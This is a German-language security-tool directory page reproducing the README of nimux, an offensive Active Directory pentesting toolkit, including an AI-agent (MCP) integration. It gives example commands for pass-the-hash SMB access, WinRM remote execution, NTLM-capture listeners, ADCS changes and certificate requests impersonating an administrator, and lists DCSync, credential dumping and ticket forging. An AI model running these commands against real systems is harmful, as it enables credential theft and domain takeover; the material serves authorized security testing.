Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nimux — Pure-Nim Netzwerk-Erkennungs- und Remote-Ausführungstoolkit für autorisierte Sicherheitsbewertungen. Unterstützt SMB, LDAP, Kerberos, WinRM, Datenbank-Clients, Geheimnissammlung, DCSync, GPO-Operationen und SOCKS-Routing. | Kitploit
Tools/GitHubGitHub/blue0x1/nimux
Privilege EscalationExploitationLaterale BewegungInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlAuthentifizierungRed Teaming
GitHubblue0x1/nimux

nimux

Pure-Nim Netzwerk-Erkennungs- und Remote-Ausführungstoolkit für autorisierte Sicherheitsbewertungen. Unterstützt SMB, LDAP, Kerberos, WinRM, Datenbank-Clients, Geheimnissammlung, DCSync, GPO-Operationen und SOCKS-Routing.

41vor 8 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
01-nimux

Pure-Nim-Toolkit für Netzwerk-Enumeration und Remote-Ausführung

License Nim Docs Release downloads

nimux - Native Operator Toolkit

nimux ist eine native Kommandooberfläche für autorisierte Sicherheitsbewertungen. Es vereint Netzwerk-Enumeration, leichtgewichtige Web-Erkennung, Anmeldedaten-Validierung, Active-Directory-Operationen, Kerberos-Workflows, Remote-Ausführung, Dateiübertragung, Secrets-Sammlung, DCSync, GPO-Operationen, Datenbank-Clients und SOCKS-Routing in einem Pure-Nim-Toolkit.

Aktuelle Version: v1.0.6

Sie befinden sich im offiziellen öffentlichen Repository für nimux.

  • Website: https://nimux.wiki
  • Dokumentation: https://docs.nimux.wiki
  • Quellcode: https://github.com/blue0x1/nimux

Hinweis

nimux wurde ausschließlich für autorisierte Tests entwickelt. Verwenden Sie es nicht gegen Systeme Dritter ohne schriftliche Genehmigung. Die Entwickler übernehmen keine Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen.

Dokumentation

Nutzungsbeispiele, Befehlsreferenzen und Workflow-Hinweise finden Sie in der Dokumentation:

https://docs.nimux.wiki

Highlights der neuesten Version

v1.0.5 fügt die leichtgewichtige Erkennungsebene um die bestehende AD-/Remote-Ops-Kommandooberfläche hinzu:

  • HTTP-Verzeichnis-, Datei- und Vhost-Erkennung mit Workern, Rekursion, Link-Extraktion, Fortsetzung und False-Positive-Filtern wie -fs
  • DNS-Subdomain-Erkennung mit Worker-Unterstützung
  • Schreibgeschütztes SMB-Share-Spidering mit Tiefen-, Größen-, Muster- und Interessante-Dateien-Filtern
  • Korrekturen bei der Enumeration anonymer/Null-Session-SMB-Shares

Es enthält außerdem die aktuellen ADCS-, BloodHound-Legacy-, Kerberos-Ausführungs- und LDAP-Capture-Arbeiten aus der v1.0.4-Linie:

  • Native ADCS-Policy-Get/Set-Workflows für EditFlags und DisableExtensionList
  • RPC-ADCS-Request/Auth-Flows mit UPN/SID-Request-Unterstützung und PFX-Ausgabe
  • BloodHound-Legacy-4.x-kompatible Ausgabe mit ACL-/Objektkontroll-Daten
  • LDAP-Capture-Listener mit zufälliger NTLM-Challenge-Generierung und wiederholter Verbindungsbehandlung

KI-Integrationen

Agent-Anleitungen und MCP-Integrationsdateien sind in SKILLS.md und integrations/ verfügbar.

Die zentrale nimux-Binärdatei bleibt unabhängig. KI-Integrationen sollten nimux als native Ausführungs-Engine aufrufen, --json bevorzugen, vor unterstützten Schreibvorgängen --dry-run verwenden und eine ausdrückliche Genehmigung für Ausführung oder Änderungen verlangen.

MCP-Wrapper

nimux-mcp ist ein separater MCP-stdio-Wrapper für KI-Clients.

Speicherort:

root@kitploit:~
integrations/mcp/nimux-mcp

Build:

root@kitploit:~
cd integrations/mcp/nimux-mcp
nimble build -y

Beispielkonfiguration für MCP-Clients:

root@kitploit:~
{
  "mcpServers": {
    "nimux": {
      "command": "/path/to/nimux/integrations/mcp/nimux-mcp/nimux_mcp",
      "env": {
        "NIMUX_BIN": "/usr/local/bin/nimux",
        "NIMUX_MCP_POLICY": "/path/to/policy.json"
      }
    }
  }
}

Der Wrapper unterstützt MCP-Content-Length-gerahmtes JSON-RPC, lokale zeilengetrennte JSON-RPC-Tests, Policy-Prüfungen, Genehmigungs-Gates, Redaktion, Fortschrittsbenachrichtigungen und SOCKS-Pivot-Metadaten.

Weitere Informationen:

https://docs.nimux.wiki/mcp-integration

Installation

Nimble

root@kitploit:~
nimble install nimux

Release herunterladen

Vorgefertigte Release-Assets sind auf GitHub verfügbar:

https://github.com/blue0x1/nimux/releases

Laden Sie das neueste Linux-Binary oder Debian-Paket von der Releases-Seite herunter.

Installieren Sie das Debian-Paket:

root@kitploit:~
sudo dpkg -i nimux_*_amd64.deb
sudo apt --fix-broken install

Verwenden Sie das eigenständige Linux-Binary:

root@kitploit:~
chmod +x nimux
./nimux --help
./nimux --version

Docker

Das öffentliche Container-Image ist im GitHub Container Registry verfügbar:

root@kitploit:~
docker run --rm -it --network host ghcr.io/blue0x1/nimux:latest --help

Einen Scan ausführen:

root@kitploit:~
docker run --rm -it --network host ghcr.io/blue0x1/nimux:latest \
  scan 10.10.10.0/24 --port 445,389,5985 --open

Leichtgewichtige Web-Erkennung ausführen:

root@kitploit:~
nimux http app.example.local --dirs words.txt --workers 100 --status 200,301,302,403 --baseline
nimux http app.example.local --dirs words.txt --auto-calibrate --recursion --depth 2 --extract-links
nimux http app.example.local --files words.txt --extensions php,txt,bak --workers 100 --filter-regex 'Not Found' -fs 325
nimux http 192.0.2.10 --vhosts vhosts.txt -d app.example.local --workers 100 --resume seen.jsonl --json
nimux dns app.example.local --subdomains subdomains.txt --workers 200 --json

Schreibgeschütztes SMB-Spidering ausführen:

root@kitploit:~
nimux smb files01.example.local --shares
nimux smb files01.example.local --spider --share Public --max-depth 3
nimux smb files01.example.local --spider --interesting --size-limit 10485760

Den MCP-Wrapper ausführen:

root@kitploit:~
docker run --rm -i --network host --entrypoint nimux_mcp \
  ghcr.io/blue0x1/nimux:latest

Arch Linux AUR

nimux ist im AUR verfügbar:

https://aur.archlinux.org/packages/nimux

Installation mit einem AUR-Helfer:

root@kitploit:~
yay -S nimux

Oder manuell bauen:

root@kitploit:~
git clone https://aur.archlinux.org/nimux.git
cd nimux
makepkg -si

BlackArch

nimux ist in BlackArch verfügbar:

root@kitploit:~
sudo pacman -S nimux

Aus dem Quellcode bauen

root@kitploit:~
git clone https://github.com/blue0x1/nimux
cd nimux
nimble build -y

Anforderungen:

  • Nim 1.6.10 oder neuer
  • OpenSSL-Entwicklungsbibliotheken
  • Kerberos-Bibliotheken
  • MinGW-w64 für Windows-Helper-Builds, die von einigen Ausführungspfaden verwendet werden

Debian-Paket

Ein lokales Debian-Paket aus dem Quellcode bauen:

root@kitploit:~
dpkg-buildpackage -us -uc -b
sudo apt install ../nimux_*.deb

Schnellbeispiele

root@kitploit:~
nimux scan 10.10.10.0/24 --port 445,389,5985 --open
nimux smb dc01.example.local -u operator -H <nt_hash> -d example.local --shares --users
nimux smb files01.example.local -u operator -p '<password>' -d example.local --spider --max-depth 3 --interesting
nimux ldap dc01.example.local -u operator -p '<password>' -d example.local --bloodhound --legacy --bloodhound-out bh-legacy.zip
nimux winrm host.example.local -u operator -p '<password>' -d example.local --cmd whoami
nimux kerberos dc01.example.local -u operator -p '<password>' -d example.local --request kinit --out <ccache>
nimux scan 10.10.10.0/24 --port 445,389,5985 --proxy socks5://127.0.0.1:1080

ADCS-Policy- und Zertifikats-Workflow-Beispiele:

root@kitploit:~
nimux ldap dc01.example.local -u '<gmsa-account>$' -H <nt_hash> -d EXAMPLE.LOCAL \
  --adcs-policy --ca CORP-CA --adcs-get-disable-extension-list

nimux ldap dc01.example.local -u '<gmsa-account>$' -H <nt_hash> -d EXAMPLE.LOCAL \
  --adcs-policy --ca CORP-CA \
  --adcs-set-disable-extension-list 1.3.6.1.4.1.311.25.2

nimux ldap dc01.example.local -u <service-user> -p '<password>' -d EXAMPLE.LOCAL \
  --adcs-request --adcs-rpc --ca CORP-CA --template User \
  --upn <admin>@example.local \
  --sid S-1-5-21-1111111111-2222222222-3333333333-500 \
  --out <admin>.pfx

LDAP-Capture-Listener:

root@kitploit:~
nimux ldap --server
nimux ldap --server --srvhost 0.0.0.0 --srvport 2222
nimux ldap --server --srvhost 0.0.0.0 --srvport 2222 --challenge 1122334455667788

Funktionen

  • TCP- und UDP-Scans mit protokollbewussten Sonden
  • Leichtgewichtige HTTP-Verzeichnis-/Datei-/Vhost-Erkennung und DNS-Subdomain-Erkennung
  • SMB-Authentifizierung, Enumeration, schreibgeschütztes Share-Spidering, Dateioperationen, Coercion und Ticket-Capture-Workflows
  • LDAP- und Active-Directory-Enumeration, Schreibvorgänge, ACL-Pfade, Roasting, RBCD, Shadow Credentials und ADCS-Unterstützung
  • BloodHound-Legacy-4.x-kompatibler LDAP-Exportmodus
  • Kerberos-TGT-, TGS-, S4U-, ccache-, kirbi-, Erneuerungs-, Purge- und Ticket-Forge-Workflows
  • WinRM-, WMI-, SCM-, DCOM-, Scheduled-Task- und Helper-Service-Ausführungsmodi
  • MSSQL-, PostgreSQL-, MySQL-, HTTP-, HTTPS-, WebDAV-, FTP-, SSH-, RDP-, VNC-, NFS- und AFP-Clients
  • SAM-, LSA-, Cached-Credentials-, DPAPI-Material- und native DCSync-Operationen
  • GPO-Erkennung, Backup, Dateioperationen, Verknüpfung und Policy-Änderungs-Workflows
  • SOCKS-Helper-Bereitstellung und globales SOCKS5-Routing mit --proxy
  • JSON-Ausgabe für Automatisierung

Befehlsfamilien

Entwicklung

Lokal bauen:

root@kitploit:~
nimble build -y

Befehlshilfe anzeigen:

root@kitploit:~
./nimux --help
./nimux smb --help
./nimux kerberos --help

Danksagungen

Chokri Hammedi

Buy Me A Coffee

Lizenz

nimux wird unter der GNU Affero General Public License v3.0 veröffentlicht. Siehe LICENSE.

Tool herunterladen
BefehlZweck
scanTCP- und UDP-Diensterkennung
smbSMB-Enumeration, Auth-Prüfungen, Dateioperationen und Coercion
ldapAD-Abfragen, Schreibvorgänge, Roasting, ACLs, RBCD, Shadow Credentials, ADCS
http, https, dnsLeichtgewichtige Web- und DNS-Erkennung
kerberosTGT, TGS, S4U, Ticket-Konvertierung, Erneuerung, Purge, Forge
winrmWinRM-Befehlsausführung, Shell und Datei-Helfer
scm, bin, cim, tsch, mmcRemote-Ausführungstransporte
mssql, postgres, mysqlDatenbank-Protokoll-Clients
secrets, dcsyncAnmeldedaten-Material und Replikations-Workflows
socksSOCKS-Helper-Bereitstellung
put, get, ls, mkdir, rmSMB-Dateioperationen